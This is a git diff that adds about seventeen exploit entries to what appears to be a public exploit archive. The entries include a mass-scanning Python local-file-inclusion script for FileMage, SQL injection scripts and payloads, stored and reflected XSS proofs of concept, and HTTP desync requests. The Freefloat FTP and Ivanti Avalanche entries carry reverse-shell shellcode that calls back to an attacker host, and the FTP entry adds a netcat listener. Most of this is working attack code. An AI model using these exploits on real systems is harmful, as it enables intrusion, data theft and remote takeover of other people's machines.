diff --git a/exploits/hardware/webapps/51709.txt b/exploits/hardware/webapps/51709.txt new file mode 100644 index 000000000..7e4851399 --- /dev/null +++ b/exploits/hardware/webapps/51709.txt @@ -0,0 +1,18 @@ +# Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information +# Date : 25-08-2023 +# Exploit Author : tahaafarooq +# Vendor Homepage : https://dlink.com/ +# Version : FRU2.2.15.8 +# Tested on: DLINK DPH-400SE (VoIP Phone) + +Description: + +With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200 + +POC : + +1. Login with the default guest credentials "guest:guest" +2. Access the Maintenance tab. +3. Under the maintenance tab, access the "Access" feature +4. On "Account Option" choose a user to modify, thus "Admin" and click modify. +5. Right click on the password, and click reveal, the password is then seen in plaintext. \ No newline at end of file diff --git a/exploits/multiple/webapps/51708.py b/exploits/multiple/webapps/51708.py new file mode 100755 index 000000000..c6b646ff0 --- /dev/null +++ b/exploits/multiple/webapps/51708.py @@ -0,0 +1,39 @@ +# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion +# Date: 8/22/2023 +# Exploit Author: Bryce "Raindayzz" Harty +# Vendor Homepage: https://www.filemage.io/ +# Version: Azure Versions < 1.10.9 +# Tested on: All Azure deployments < 1.10.9 +# CVE : CVE-2023-39026 + +# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html +# Patch from vendor - https://www.filemage.io/docs/updates.html + +import requests +import warnings +warnings.filterwarnings("ignore") +def worker(url): + response = requests.get(url, verify=False, timeout=.5) + return response +def main(): + listIP = [] + file_path = input("Enter the path to the file containing the IP addresses: ") + with open(file_path, 'r') as file: + ip_list = file.read().splitlines() + searchString = "tls" + for ip in ip_list: + url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml" + try: + response = worker(url) + #print(response.text) + if searchString in response.text: + print("Vulnerable IP: " + ip) + print(response.text) + listIP.append(ip) + except requests.exceptions.RequestException as e: + print(f"Error occurred for {ip}: {str(e)}") + + for x in listIP: + print(x) +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/51697.txt b/exploits/php/webapps/51697.txt new file mode 100644 index 000000000..258dd9a84 --- /dev/null +++ b/exploits/php/webapps/51697.txt @@ -0,0 +1,20 @@ +# Exploit Title: Blood Donor Management System v1.0 - Stored XSS +# Application: Blood Donor Management System +# Version: v1.0 +# Bugs: Stored XSS +# Technology: PHP +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/blood-donor-management-system-using-codeigniter/ +# Date: 15.08.2023 +# Author: Ehlullah Albayrak +# Tested on: Windows + + +#POC +======================================== +1. Login to user account +2. Go to Profile +3. Change "State" input and add "" payload. +4. Go to http://localhost/blood/welcome page and search "O", XSS will be triggered. + +#Payload: \ No newline at end of file diff --git a/exploits/php/webapps/51698.txt b/exploits/php/webapps/51698.txt new file mode 100644 index 000000000..75591fa6d --- /dev/null +++ b/exploits/php/webapps/51698.txt @@ -0,0 +1,49 @@ +# Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload +# Exploit Author: CraCkEr +# Date: 30/07/2023 +# Vendor: tdevs +# Vendor Homepage: https://tdevs.co/ +# Software Link: https://hyiprio-feature.tdevs.co/ +# Version: 2.1 +# Tested on: Windows 10 Pro +# Impact: Allows User to upload files to the web server +# CVE: CVE-2023-4382 + + +## Description + +Allows Attacker to upload malicious files onto the server, such as Stored XSS + + +## Steps to Reproduce: + +1. Login as a [Normal User] +2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings +3. Upload any Image into the [avatar] +4. Capture the POST Request with [Burp Proxy Intercept] +5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] + +----------------------------------------------------------- +POST /user/settings/profile-update HTTP/2 + +Content-Disposition: form-data; name="avatar"; filename="XSS.svg" +Content-Type: image/png + + + + + + + + +----------------------------------------------------------- + +6. Send the Request +7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link +8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg + + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51701.txt b/exploits/php/webapps/51701.txt new file mode 100644 index 000000000..0e6496311 --- /dev/null +++ b/exploits/php/webapps/51701.txt @@ -0,0 +1,56 @@ +# Exploit Title: Credit Lite 1.5.4 - SQL Injection +# Exploit Author: CraCkEr +# Date: 31/07/2023 +# Vendor: Hobby-Tech +# Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392 +# Software Link: https://credit-lite.appshat.xyz/ +# Version: 1.5.4 +# Tested on: Windows 10 Pro +# Impact: Database Access +# CVE: CVE-2023-4407 +# CWE: CWE-89 - CWE-74 - CWE-707 + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + + +## Steps to Reproduce: + +To Catch the POST Request + +1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement + +2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter] + + + +Path: /portal/reports/account_statement + +POST parameter 'date1' is vulnerable to SQL Injection +POST parameter 'date2' is vulnerable to SQL Injection + +------------------------------------------------------------------------- +POST /portal/reports/account_statement HTTP/2 + +_token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001 +------------------------------------------------------------------------- + +--- +Parameter: date1 (POST) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001 + +Parameter: date2 (POST) +Type: time-based blind +Title: MySQL >= 5.0.12 time-based blind (query SLEEP) +Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001 +--- + + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51702.txt b/exploits/php/webapps/51702.txt new file mode 100644 index 000000000..8abd1d701 --- /dev/null +++ b/exploits/php/webapps/51702.txt @@ -0,0 +1,50 @@ +# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload +# Exploit Author: CraCkEr +# Date: 05/08/2023 +# Vendor: Creativeitem +# Vendor Homepage: https://academylms.net/ +# Software Link: https://demo.academylms.net/ +# Version: 6.1 +# Tested on: Windows 10 Pro +# Impact: Allows User to upload files to the web server +# CWE: CWE-79 - CWE-74 - CWE-707 + + +## Description + +Allows Attacker to upload malicious files onto the server, such as Stored XSS + + +## Steps to Reproduce: + +1. Login as a [Normal User] +2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings +3. Upload any Image into the [avatar] +4. Capture the POST Request with [Burp Proxy Intercept] +5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] + +----------------------------------------------------------- +POST /wp-admin/async-upload.php HTTP/2 + +----------------------------------------------------------- +Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg" +Content-Type: image/svg+xml + + + + + + + + +----------------------------------------------------------- + +6. Send the Request +7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] +8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg + + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51703.txt b/exploits/php/webapps/51703.txt new file mode 100644 index 000000000..6c79a7498 --- /dev/null +++ b/exploits/php/webapps/51703.txt @@ -0,0 +1,41 @@ +# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' ) +# Date: 2023/08/18 +# CVE: CVE-2023-38910 +# Exploit Author: Daniel González +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://github.com/cskaza/cszcms +# Version: 1.3.0 +# Tested on: CSZ CMS 1.3.0 +# Description: +# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin. + +# Steps to reproduce Stored XSS: + +Go to url http://localhost/admin/carousel. + +We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields. +We can inject HTML code. + +With the following payload we can achieve the XSS. + +Payload: + +

+ + +#PoC Request: + + +POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 137 +Origin: http://localhost:8080 +Referer: http://localhost:8080/admin/carousel/edit/3 +Upgrade-Insecure-Requests: 1 + +carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add \ No newline at end of file diff --git a/exploits/php/webapps/51704.txt b/exploits/php/webapps/51704.txt new file mode 100644 index 000000000..3c4b91edf --- /dev/null +++ b/exploits/php/webapps/51704.txt @@ -0,0 +1,39 @@ +# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery') +# Date: 2023/08/18 +# CVE: CVE-2023-38911 +# Exploit Author: Daniel González +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://github.com/cskaza/cszcms +# Version: 1.3.0 +# Tested on: CSZ CMS 1.3.0 +# Description: +# CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery. + +# Steps to reproduce Stored XSS: + +Go to url http://localhost/admin/plugin/gallery/edit/2. + +When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2] +We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields. + +With the following payload we can achieve the XSS + +Payload: + +

+ + +#PoC Request: + +POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1 +Host: localhost:8080 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 140 +Origin: http://localhost:8080 +Referer: http://localhost:8080/admin/plugin/gallery/edit/2 +Upgrade-Insecure-Requests: 1 + +gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add \ No newline at end of file diff --git a/exploits/php/webapps/51705.txt b/exploits/php/webapps/51705.txt new file mode 100644 index 000000000..c4f26b27a --- /dev/null +++ b/exploits/php/webapps/51705.txt @@ -0,0 +1,28 @@ +# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control +# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554) +# Date: 21.12.2022 +# Exploit Author: kv1to +# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17 +# Tested on: Raspbian / Debian +# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497 +# CVE : CVE-2022-23513 + +In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint. + +## Proof Of Concept with curl: +curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=' + +## HTTP requests +GET /admin/scripts/pi-hole/php/queryads.php?domain=' HTTP/1.1 +HOST: pi.hole +Cookie: [..SNIPPED..] +[..SNIPPED..] + +## HTTP Response +HTTP/1.1 200 OK +[..SNIPPED..] + +data: Match found in [..SNIPPED..] +data: +data: +data: \ No newline at end of file diff --git a/exploits/php/webapps/51710.txt b/exploits/php/webapps/51710.txt new file mode 100644 index 000000000..9d8523100 --- /dev/null +++ b/exploits/php/webapps/51710.txt @@ -0,0 +1,88 @@ +## Title: Member Login Script 3.3 - Client-side desync +## Author: nu11secur1ty +## Date: 08/25/2023 +## Vendor: https://www.phpjabbers.com/ +## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync + +## Description: +The server appears to be vulnerable to client-side desync attacks. A +POST request was sent to the path '/1692959852_473/index.php' with a +second request sent as the body. The server ignored the Content-Length +header and did not close the connection, leading to the smuggled +request being interpreted as the next request. + +STATUS: HIGH Vulnerability + +[+]Exploit: +``` +POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss +HTTP/1.1 +Host: demo.phpjabbers.com +Accept-Encoding: gzip, deflate +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 +Safari/537.36 +Connection: keep-alive +Cache-Control: max-age=0 +Cookie: _ga=GA1.2.2069938240.1692907228; +_gid=GA1.2.1275975650.1692907228; _gat=1; +_fbp=fb.1.1692907228280.366290059; +_ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0; +YellowPages=slk3eokcgmdf0r3t7c020quv35; +pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1 +Upgrade-Insecure-Requests: 1 +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 +Content-Length: 1190 +Content-Type: application/x-www-form-urlencoded + +GET /robots.txt HTTP/1.1 +Host: demo.phpjabbers.com +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 +Safari/537.36 +Connection: keep-alive +Cache-Control: max-age=0 + +GET /robots.txt HTTP/2 +Host: www.pornhub.com +Cookie: platform=pc; ss=405039333413129808; +fg_0d2ec4cbd943df07ec161982a603817e=60256.100000; +fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000 +Cache-Control: max-age=0 +Sec-Ch-Ua: +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Full-Version: "" +Sec-Ch-Ua-Arch: "" +Sec-Ch-Ua-Platform: "" +Sec-Ch-Ua-Platform-Version: "" +Sec-Ch-Ua-Model: "" +Sec-Ch-Ua-Full-Version-List: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) +AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 +Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html) + +## Time spend: +00:35:00 \ No newline at end of file diff --git a/exploits/php/webapps/51711.py b/exploits/php/webapps/51711.py new file mode 100755 index 000000000..384e03ae0 --- /dev/null +++ b/exploits/php/webapps/51711.py @@ -0,0 +1,53 @@ +# Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated) +# Date: 13/02/2022 +# Exploit Author: psychoSherlock +# Vendor Homepage: https://wp-statistics.com/ +# Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip +# Version: 13.1.5 and prior +# Tested on: wp-statistics 13.1.5 +# CVE : CVE-2022-25148 +# Vendor URL: https://wordpress.org/plugins/wp-statistics/ +# CVSS Score: 8.4 (High) + +import argparse +import requests +import re +import urllib.parse + + +def main(): + parser = argparse.ArgumentParser(description="CVE-2022-25148") + parser.add_argument('-u', '--url', required=True, + help='Wordpress base URL') + + args = parser.parse_args() + + baseUrl = args.url + payload = "IF(1=1, sleep(5), 1)" + + wp_session = requests.session() + + resp = wp_session.get(baseUrl) + nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1) + print(f"Gathered Nonce: {nonce}") + + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"} + + payload = urllib.parse.quote_plus(payload) + exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1×tamp=11¤t_page_type=home¤t_page_id={payload}&search_query&page_uri=/&user_id=0' + exploit_url = baseUrl + exploit + + print(f'\nSending: {exploit_url}') + + resp = wp_session.get(exploit_url, headers=headers) + + if float(resp.elapsed.total_seconds()) >= 5.0: + print("\n!!! Target is vulnerable !!!") + print(f'\nTime taken: {resp.elapsed.total_seconds()}') + else: + print('Target is not vulnerable') + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/51712.txt b/exploits/php/webapps/51712.txt new file mode 100644 index 000000000..6a66cde1f --- /dev/null +++ b/exploits/php/webapps/51712.txt @@ -0,0 +1,48 @@ +## Title: Bus Reservation System-1.1 Multiple-SQLi +## Author: nu11secur1ty +## Date: 08/26/2023 +## Vendor: https://www.phpjabbers.com/ +## Software: https://demo.phpjabbers.com/1693027053_628/preview.php?lid=1 +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The `pickup_id` parameter appears to be vulnerable to SQL injection +attacks. The payload ' was submitted in the pickup_id parameter, and a +database error message was returned. You should review the contents of +the error message, and the application's handling of other input, to +confirm whether a vulnerability is present. The attacker can steal +information from all database! + +STATUS: HIGH-CRITICAL Vulnerability + +[+]Payload: +```mysql +--- +Parameter: pickup_id (GET) + Type: boolean-based blind + Title: Boolean-based blind - Parameter replace (original value) + Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT +(CASE WHEN (3959=3959) THEN 0x3927 ELSE (SELECT 8499 UNION SELECT +2098) END))&session_id= + + Type: error-based + Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET) + Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=GTID_SUBSET(CONCAT(0x71626b7a71,(SELECT +(ELT(5210=5210,1))),0x716a6b7171),5210)&session_id= + + Type: time-based blind + Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) + Payload: controller=pjFrontEnd&action=pjActionGetLocations&locale=1&hide=0&index=6138&pickup_id=(SELECT +2616 FROM (SELECT(SLEEP(15)))clIR)&session_id= +--- + +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Bus-Reservation-System-1.1-Multiple-SQLi) + +## Proof and Exploit: +[href](https://www.nu11secur1ty.com/2023/08/bus-reservation-system-11-multiple-sqli.html) + +## Time spend: +00:25:00 \ No newline at end of file diff --git a/exploits/php/webapps/51713.txt b/exploits/php/webapps/51713.txt new file mode 100644 index 000000000..cb2078fce --- /dev/null +++ b/exploits/php/webapps/51713.txt @@ -0,0 +1,39 @@ +# Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS +# Exploit Author: CraCkEr +# Date: 20/08/2023 +# Vendor: SPA-Cart +# Vendor Homepage: https://spa-cart.com/ +# Software Link: https://demo.spa-cart.com/ +# Version: 1.9.0.3 +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site +# CVE: CVE-2023-4547 +# CWE: CWE-79 - CWE-74 - CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + +Path: /search + +GET parameter 'filter[brandid]' is vulnerable to XSS +GET parameter 'filter[price]' is vulnerable to XSS + +https://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GB + + +XSS Payloads: + +vnxjb">bvu51 + + +[-] Done \ No newline at end of file diff --git a/exploits/windows/local/51700.txt b/exploits/windows/local/51700.txt new file mode 100644 index 000000000..735de3640 --- /dev/null +++ b/exploits/windows/local/51700.txt @@ -0,0 +1,30 @@ +# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS) +# Discovered by: Ahmet Ümit BAYRAM +# Discovered Date: 2023-08-19 +# Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar +# Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf +# Vulnerability Type: Buffer Overflow Local +# Tested On: Windows 10 64bit +# Tested Version: 5.0 + + +# Steps to Reproduce: +# 1- Run the python script and create exploit.txt file +# 2- Open the application and log in +# 3- Click the "Config" button in the upper menu +# 4- Click the "User" button just below it +# 5- Now click the "Add users" button in the lower left +# 6- Fill in the Username, Password, and Confirm boxes +# 7- Paste the characters from exploit.txt into the Contact box +# 8- Click OK and crash! + +#!/usr/bin/env python3 + +exploit = 'A' * 846 + +try: + with open("exploit.txt","w") as file: + file.write(exploit) + print("POC is created") +except: + print("POC not created") \ No newline at end of file diff --git a/exploits/windows/local/51706.txt b/exploits/windows/local/51706.txt new file mode 100644 index 000000000..3fe6c34c2 --- /dev/null +++ b/exploits/windows/local/51706.txt @@ -0,0 +1,70 @@ +#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow +#Date: 08/22/2023 +#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) +#Vendor Homepage: http://www.freefoat.com +#Version: 1.0 +#Tested on Windows XP SP3 + + +#!/usr/bin/python + +import socket + +#Metasploit Shellcode +#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' + +#nc -lvp 4444 +#Send exploit + + +#offset = 247 +#badchars=\x00\x0d\ +#return_address=\x3b\x69\x5a\x77 (ole32.dll) + +payload = ( +"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9" +"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca" +"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83" +"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26" +"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49" +"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54" +"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66" +"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1" +"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a" +"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82" +"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7" +"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9" +"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41" +"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac" +"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a" +"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc" +"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4" +"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f" +"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29" +"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf" +"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7" +"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d" +"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac" +"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6" +"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0" +"\x19") + +shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload + +def main(): + ip = '192.168.146.135' + port = 21 + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((ip, port)) + + sock.recv(1024) + sock.send('USER anonymous\r\n') + sock.recv(1024) + sock.send('PASS anonymous\r\n') + sock.recv(1024) + sock.send('pwd ' + shellcode + '\r\n') + sock.close() + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/windows/local/51707.txt b/exploits/windows/local/51707.txt new file mode 100644 index 000000000..119454563 --- /dev/null +++ b/exploits/windows/local/51707.txt @@ -0,0 +1,29 @@ +#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path +#Date: 8/22/2023 +#Exploit Author: Anish Feroz (ZEROXINN) +#Vendor Homepage: https://www.kingoapp.com/ +#Software Link: https://www.kingoapp.com/android-root/download.htm +#Version: 1.5.8.3353 +#Tested on: Windows 10 Pro + +-------------Discovering Unquoted Path-------------- + +C:\Users\Anish>sc qc KingoSoftService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: KingoSoftService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : KingoSoftService + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\Anish>systeminfo + +Host Name: DESKTOP-UT7E7CF +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19045 N/A Build 19045 \ No newline at end of file diff --git a/exploits/windows/remote/51699.py b/exploits/windows/remote/51699.py new file mode 100755 index 000000000..3d6c2e046 --- /dev/null +++ b/exploits/windows/remote/51699.py @@ -0,0 +1,122 @@ +""" +Exploit Title: Ivanti Avalanche III{}s{}s'.format(self.name_size, self.value_size), + self.type, self.name_size, self.value_size, self.name, self.value) + +# Create a header structure +class HP: + def __init__(self, hdr, payload): + self.hdr = hdr + self.payload = payload + self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16) + + def pack(self): + return b''.join([item.pack() for item in self.hdr]) + \ + b''.join([item.pack() for item in self.payload]) + self.pad + +# Create a preamble structure +class Preamble: + def __init__(self, hp): + self.msg_size = len(hp.pack()) + 16 + self.hdr_size = sum([len(item.pack()) for item in hp.hdr]) + self.payload_size = sum([len(item.pack()) for item in hp.payload]) + self.unk = 0 # Unknown value + + def pack(self): + return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk) + +# Create a message structure +class Msg: + def __init__(self, hp): + self.pre = Preamble(hp) + self.hdrpay = hp + + def pack(self): + return self.pre.pack() + self.hdrpay.pack() + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python +shellcode = b"" +shellcode += b"fce8820000006089e531c064" +shellcode += b"8b50308b520c8b52148b7228" +shellcode += b"0fb74a2631ffac3c617c022c" +shellcode += b"20c1cf0d01c7e2f252578b52" +shellcode += b"108b4a3c8b4c1178e34801d1" +shellcode += 